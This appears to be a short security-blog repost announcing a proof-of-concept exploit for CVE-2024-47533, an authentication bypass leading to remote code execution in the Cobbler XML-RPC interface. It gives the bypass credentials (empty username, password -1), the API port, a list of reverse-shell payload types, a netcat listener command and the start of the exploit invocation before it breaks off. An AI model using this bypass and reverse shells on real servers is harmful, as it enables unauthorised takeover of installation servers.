Site icon API Security Blog

Exploit for CVE-2024-47533

image
CVE-2024-47533 โ€“ Cobbler XMLRPC Authentication Bypass RCE Exploit โš ๏ธ Critical Remote Code Execution via Authentication Bypass in Cobbler ๐Ÿ› ๏ธ PoC implementation by @dollarboysushil ๐Ÿ’ก Overview Cobbler, a Linux installation server that enables rapid setup of network installation environments, has an authentication vulnerability in versions 3.0.0 up to (but not including) 3.2.3 and 3.3.7. The function utils.get_shared_secret() always returns -1, allowing anyone to connect to the Cobbler XML-RPC interface with an empty username ('') and password -1. This lets an attacker with network access gain full control of the Cobbler server. The vulnerability is fixed in versions 3.2.3 and 3.3.7. ๐Ÿ›  Technical Breakdown The vulnerability is caused by improper handling of the shared secret in the utils.get_shared_secret() function, which always returns -1, effectively bypassing authentication. This lets any network user connect to Cobblerโ€™s XMLRPC interface with empty credentials and execute arbitrary commands. ๐Ÿ”ฅ Vulnerable Endpoint https://:25151/ โ€” Cobbler's XMLRPC API endpoint ๐Ÿ’ฅ Example Payloads The exploit script supports various reverse shell payloads including: Bash reverse shell Netcat shells (nc, nc2) Python reverse shell Curl download & execute ๐Ÿ”ฌ Proof-of-Concept (PoC) Demonstration ๐Ÿ“ก Preparing the Listener Start a Netcat listener on your machine: bash nc -lvnp 4444 ๐Ÿš€ Launching the Exploit Run the exploit script CVE-2024-47533-dbs.py. bash python3 CVE-2024-47533-dbs.py -tโ€ฆRead More

Exit mobile version